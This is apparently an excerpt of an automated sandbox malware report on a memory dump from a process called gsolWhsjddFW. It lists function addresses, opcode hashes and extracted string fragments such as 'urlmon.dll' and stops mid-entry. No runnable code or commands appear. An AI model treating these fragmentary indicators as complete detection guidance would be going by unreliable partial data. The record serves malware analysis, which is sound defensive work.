                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                      • Instruction ID: f8c2eccb675cc23ece7abb74dfff7727057c77fc25e69a3bc9110c8dd498f90f
                                                                      • Opcode Fuzzy Hash: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                      • Instruction Fuzzy Hash: B82139B5A00649AFDB14DF98CC81EEFBBB9EF88700F008509F905AB244D774A915CFA5
                                                                      Function 03610A6B Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                      • Instruction ID: d7ee8fe56bad5339b46669f5341423106526beca81821f7e46db34303486651c
                                                                      • Opcode Fuzzy Hash: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                      • Instruction Fuzzy Hash: 1911E9B63807147BF720DA159C83FAB776D9B84B10F254008FB08AE3C1D7A4B8114AB8
                                                                      Function 0362130B Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 98bfbf6d6f3978745ddeb3f3fb759692e3ce872b1c554d63368453d2905f381b
                                                                      • Instruction ID: ebf6f4c952118e40631d562c1ba4c32c1e4435323fd281be9ff174964b5bb1cd
                                                                      • Opcode Fuzzy Hash: 98bfbf6d6f3978745ddeb3f3fb759692e3ce872b1c554d63368453d2905f381b
                                                                      • Instruction Fuzzy Hash: 14115B75A00B59AFD710EF98CC45FEFBBBCEB84700F004449F905AB280DB7469168BA5
                                                                      Function 0361E41B Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b4290e51ade4bc7a00ed4b3f80550f9f27d243f8d4817b572e883de5da639e6
                                                                      • Instruction ID: 0b1ea05444362466a6c389b64bec1af42c5538f86add065fd37ee542395ba235
                                                                      • Opcode Fuzzy Hash: 1b4290e51ade4bc7a00ed4b3f80550f9f27d243f8d4817b572e883de5da639e6
                                                                      • Instruction Fuzzy Hash: 312133B6D01219AF8B00DFA9D8419EFB7F9FF88200F14865AE909E7204E7715A15CFE1
                                                                      Function 0362148B Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58c97ddedf5ebd353b785620f64a1c794d3b2c3bc08d709393070b982bf91509
                                                                      • Instruction ID: 2e7afb7f307b7d8a319df37b6f9536d1d75f4c2cf1a8a128628b3f2ed7673390
                                                                      • Opcode Fuzzy Hash: 58c97ddedf5ebd353b785620f64a1c794d3b2c3bc08d709393070b982bf91509
                                                                      • Instruction Fuzzy Hash: E2118E75A007996FD710EF98CC45FEF7BBCEB85700F004449F9056B284DB7469018BA5
                                                                      Function 0361F26B Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50617d71681ac4f08cb74061c7d9ede69188b6ea6e73b68f04931e517d8a6fae
                                                                      • Instruction ID: 37fcdade36e323bc0b9f46e86a12848434e1cf1a2f7b87eb71cca779f16325ad
                                                                      • Opcode Fuzzy Hash: 50617d71681ac4f08cb74061c7d9ede69188b6ea6e73b68f04931e517d8a6fae
                                                                      • Instruction Fuzzy Hash: F0111FB6D0121CAF9B00DFA9D9419EFB7FDFF48200F14826AE909E7244E7705A008BE1
                                                                      Function 0361EB7B Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65d660420cca9dbf9c81a085e65e1a0af8019b19b4b8f88742e7303b65dd8e01
                                                                      • Instruction ID: 1914aef378680e4418a2f54c5df57cb1e5ae1f53eed13b19f325fdba324a0c20
                                                                      • Opcode Fuzzy Hash: 65d660420cca9dbf9c81a085e65e1a0af8019b19b4b8f88742e7303b65dd8e01
                                                                      • Instruction Fuzzy Hash: 7D1130F6D01219AF8F00DFE9D8409EEBBF9FF49200F54456AE919F7210E7709A048BA1
                                                                      Function 0361A21B Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5db34f9675e8229cf1d0918d5d246a2562a4e0f9463de46e4963cb9566bb69d7
                                                                      • Instruction ID: 28ea8a85b673b591e76de4e75ebbb68d629c9d96a76daf312386a35a1bc61866
                                                                      • Opcode Fuzzy Hash: 5db34f9675e8229cf1d0918d5d246a2562a4e0f9463de46e4963cb9566bb69d7
                                                                      • Instruction Fuzzy Hash: 8301D6BAA007242BE710E7A4DC45DEB777CDF45210F000259FD149B241FB706E514AE5
                                                                      Function 035FC1DC Relevance: .0, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8c6259448a6ede939e285b58bd613c0455a299c8e759ffdd95ffa169cb028ba5
                                                                      • Instruction ID: 142ada53b722b3e5bdad223406279bdf877e69655fb40a7ff45eee91737eeff5
                                                                      • Opcode Fuzzy Hash: 8c6259448a6ede939e285b58bd613c0455a299c8e759ffdd95ffa169cb028ba5
                                                                      • Instruction Fuzzy Hash: 1511F7B1D11329AFCB40CFAD98805DEBFF8FA49624B14826BE868E7210D3719641CFD4
                                                                      Function 0362230B Relevance: .0, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                      • Instruction ID: c6b9b881601d375751edc4e9372481257cad84b5e8cb30a44b113fd292791590
                                                                      • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                      • Instruction Fuzzy Hash: FC01C0B6200608BBCB44DE99DC81EDB77ADEF8C710F108108FA0DA7240DA30E8528BA4
                                                                      Function 0361DE9B Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c96488b43889262f2ef5ffbe644729f95a9cde94faf93a4538aea6f5f64e8b2b
                                                                      • Instruction ID: 05aadaa40d33368cdbdce1858af4ed7e12d243b2a1d318fa345a024f6cde571a
                                                                      • Opcode Fuzzy Hash: c96488b43889262f2ef5ffbe644729f95a9cde94faf93a4538aea6f5f64e8b2b
                                                                      • Instruction Fuzzy Hash: 6D01E9F6C01219AFDB40DFE8D9409EEBBF8BB58600F14466EE909F7240F77056048BA1
                                                                      Function 035FC33B Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a665619789d0377804c749cb241232c53479e2199996a89c87293cba33bc3b49
                                                                      • Instruction ID: 32f4b6d9f3b0b1eb08f84e2bd1a10ca023c437c63939cefa960946b38ad91711
                                                                      • Opcode Fuzzy Hash: a665619789d0377804c749cb241232c53479e2199996a89c87293cba33bc3b49
                                                                      • Instruction Fuzzy Hash: 97F089775142165BD7109A5DAC80FCAF7DCFB45275F150132F91C86291E671A45186A0
                                                                      Function 0362158B Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                      • Instruction ID: 483727c17b9f513f9188f373ae143164681c07d4306f70ae473ff09dd32decde
                                                                      • Opcode Fuzzy Hash: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                      • Instruction Fuzzy Hash: FEF0F8B52006197FDB10DE99DC81EDB77ADEFC8610F108419FA18A7241D770B9118BB5
                                                                      Function 035FC3B5 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                      • Instruction ID: ed31bcfd13db2a55f4235ed44d5700ea4b22ae03165a8c34f798ebd5d0eaa1c4
                                                                      • Opcode Fuzzy Hash: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                      • Instruction Fuzzy Hash: CFE0683B408A2F4AC2119A2C78C0486F391F9822393298376C55B4B2A1DA32A84682C2
                                                                      Function 03610B8B Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                      • Instruction ID: c7f43cf6270ec5aa95719be93e0ef1e6639565cd7803b2b531a5103e645bf7f9
                                                                      • Opcode Fuzzy Hash: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                      • Instruction Fuzzy Hash: 6AF0897181520CEBDF14CF64D881BDEBB74EB04324F1483ADE8159B280D63597918791
                                                                      Function 0362227B Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction ID: d472749b6ec65d17baa26d4cd1fb9083823cf81559d4df3667f17b3b45349359
                                                                      • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction Fuzzy Hash: 2BE032BA204A187FE610EA68DC41E9B37ADEBC8B10F004419FA08AB240C720B8108AB5
                                                                      Function 0362222B Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction ID: 333f06a26bf20a8ec6254e1f9fcea9831d28659bf70cc94780446120f455368f
                                                                      • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction Fuzzy Hash: 06E06D792047087BD610EE58DC41EDB37ADEFC5B10F004418F908A7241C731BA118BB5
                                                                      Function 0362404B Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                      • Instruction ID: 7dbc8219d301fd504a7fbf5a856fafbe4f12ea166c07ae9116c5627500989324
                                                                      • Opcode Fuzzy Hash: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                      • Instruction Fuzzy Hash: E1E08076A0173437D622A69A9D05F97BB5CCFC5D60F0A0164FE0C5F340E565BD4146E4
                                                                      Function 03621F2B Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction ID: b100de2f11168a801c1863ab014dfbd367291dd9c5f3c0f323159baedef30f02
                                                                      • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction Fuzzy Hash: 7CE04F392016187BD610EA59DC41FD77B6CDBC5B10F104419FA196B241C770B9018AA1
                                                                      Function 035FC3A4 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                      • Instruction ID: 9ce2744ec4d24ac92706d181613026b5276b5587327b206c3dd0a23b144606f1
                                                                      • Opcode Fuzzy Hash: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                      • Instruction Fuzzy Hash: 28D02E3B82812B0A8A04667C3C80488E3C4B2822383380732C0ADC22F1EA22D0638290
                                                                      Function 03623F6B Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d424afd1da14cc6884ce4dbef58714dac59df3d1504d2408a7131edf19f28c31
                                                                      • Instruction ID: a9f0ae0110d097bdc59018a8975f58ae3864145e26f058d7d3d89e89ac9346c3
                                                                      • Opcode Fuzzy Hash: d424afd1da14cc6884ce4dbef58714dac59df3d1504d2408a7131edf19f28c31
                                                                      • Instruction Fuzzy Hash: C9C012755043087BDA00DA88CC45F65339C9708610F004494B90C8F241D571B9104A58
                                                                      Function 03603896 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1df84a0eee3e4cc67a76d8a10966a2b4a064a57548f73dbf1a53d0cdf12b629f
                                                                      • Instruction ID: 19b602a81fda8499493628715628c9e86d1fa3023e8c3f60ad29805051f2e9d3
                                                                      • Opcode Fuzzy Hash: 1df84a0eee3e4cc67a76d8a10966a2b4a064a57548f73dbf1a53d0cdf12b629f
                                                                      • Instruction Fuzzy Hash: ECB02282E002E2022B2E3238020800BAC0208830A038002A03C02AE2CACAA288038080

                                                                      Non-executed Functions

                                                                      Function 03602C3F Relevance: 41.4, Strings: 33, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${
                                                                      • API String ID: 0-808712017
                                                                      • Opcode ID: be7c461cf5934487054bd827d7726ae8993deaec0117f7f195939b92848edf32
                                                                      • Instruction ID: 1aefe1a1d1bec4af8290619926a9f75ad3c37071cb774576312468b290ee6a08
                                                                      • Opcode Fuzzy Hash: be7c461cf5934487054bd827d7726ae8993deaec0117f7f195939b92848edf32
                                                                      • Instruction Fuzzy Hash: B0C139B0D05669CBEB61CF41C9987DEBBB1BB45308F1085C9C5583B281CBBA1AC9CF95
                                                                      Function 0361B42B Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                      • API String ID: 0-1002149817
                                                                      • Opcode ID: 7910ac4fe835690470d353283db70fae01acbf1182b370f301be357165bcb1e8
                                                                      • Instruction ID: 5dbd9bf289725fc2c15a8c1cb73a93d7ba7afa095c7c928b8001950f0a3425a2
                                                                      • Opcode Fuzzy Hash: 7910ac4fe835690470d353283db70fae01acbf1182b370f301be357165bcb1e8
                                                                      • Instruction Fuzzy Hash: E5C12EB1D113289ADB21DFA5CD44BEEBBB8AF44304F0081D9D50CBB241E7B54A88CFA5
                                                                      Function 036182DB Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                      • API String ID: 0-3236418099
                                                                      • Opcode ID: 6ef1d1c855674922dea5499f1b6f951d3dcbc288913238e2771a42d0c75b9a10
                                                                      • Instruction ID: 9b21fb06a832c61c785b65cd70df3771a0e088fb28e0239ab1f31eeb5dc3a305
                                                                      • Opcode Fuzzy Hash: 6ef1d1c855674922dea5499f1b6f951d3dcbc288913238e2771a42d0c75b9a10
                                                                      • Instruction Fuzzy Hash: B9916FB590072CAAEB21DFA58C45FEEB7B8EF44300F44419DE508AA140EB755B89CFA5
                                                                      Function 035FBFBF Relevance: 23.8, Strings: 19, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$C$c&-n$msmu$qs$qsck$tqmq$umrx$vmsc$vpwm$vpwm$vpwmqs
                                                                      • API String ID: 0-523877151
                                                                      • Opcode ID: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                      • Instruction ID: eb32f547f2de422368e5df1d0e8d962bc9cc901790a77f00e5a246f570de5760
                                                                      • Opcode Fuzzy Hash: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                      • Instruction Fuzzy Hash: 8521C8B4C053989BCF24DF96EA8269DBF30BB05704F209248D9153F215D77A0A85CF9A
                                                                      Function 035FBFCB Relevance: 23.8, Strings: 19, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$C$c&-n$msmu$qs$qsck$tqmq$umrx$vmsc$vpwm$vpwm$vpwmqs
                                                                      • API String ID: 0-523877151
                                                                      • Opcode ID: 5915565d0bb1f0ebe598f90a9ba0a55d8f774ce5c9d680fda0c3f8fd2e1cec76
                                                                      • Instruction ID: 38ea63ed7babead11b6cb817bc24a609e62721f3853936e3087649b9085fcfc2
                                                                      • Opcode Fuzzy Hash: 5915565d0bb1f0ebe598f90a9ba0a55d8f774ce5c9d680fda0c3f8fd2e1cec76
                                                                      • Instruction Fuzzy Hash: D121B7B4C053AC9BCF24DF96EA8269DBF70BB01704F20A248D9153F214D77A0A45CF9A
                                                                      Function 03613A5B Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                      • API String ID: 0-392141074
                                                                      • Opcode ID: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                      • Instruction ID: 9245df022bc2b94c11e1f541289f360a5469c03955b198c65efc25302bb71dfc
                                                                      • Opcode Fuzzy Hash: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                      • Instruction Fuzzy Hash: 21711CB5D00728AADB15DBA5CC41FEFBB7CBF08700F04459DE519AA180EB715B488FA5
                                                                      Function 036076FB Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                      • API String ID: 0-685823316
                                                                      • Opcode ID: 344cdc8e5b6120e6ab6104b1ae08699e39eeb5692f43d076a6969cf7fd696278
                                                                      • Instruction ID: bbd62895a7d7b76e626571585929c796b1cca6bf59b9b5af45620ba5b04202cc
                                                                      • Opcode Fuzzy Hash: 344cdc8e5b6120e6ab6104b1ae08699e39eeb5692f43d076a6969cf7fd696278
                                                                      • Instruction Fuzzy Hash: 5C2173B5D11318AADF54DFD4DC85BEEBBB9AF04704F10815CE608BA180DBB516488FA4
                                                                      Function 036076F2 Relevance: 13.8, Strings: 11, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
